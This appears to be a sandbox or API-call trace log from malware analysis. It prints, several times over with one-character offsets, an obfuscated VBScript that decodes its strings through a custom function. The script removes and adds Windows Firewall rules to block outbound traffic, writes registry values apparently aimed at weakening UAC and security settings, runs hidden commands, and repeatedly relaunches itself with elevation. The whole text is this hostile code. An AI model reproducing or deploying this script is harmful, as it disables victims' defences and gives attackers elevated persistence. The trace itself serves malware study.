bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.323] wcsncmp (_String1=" ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.323] wcsncmp (_String1="ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0226.323] wcsncmp (_String1="CTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.323] wcsncmp (_String1="TION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 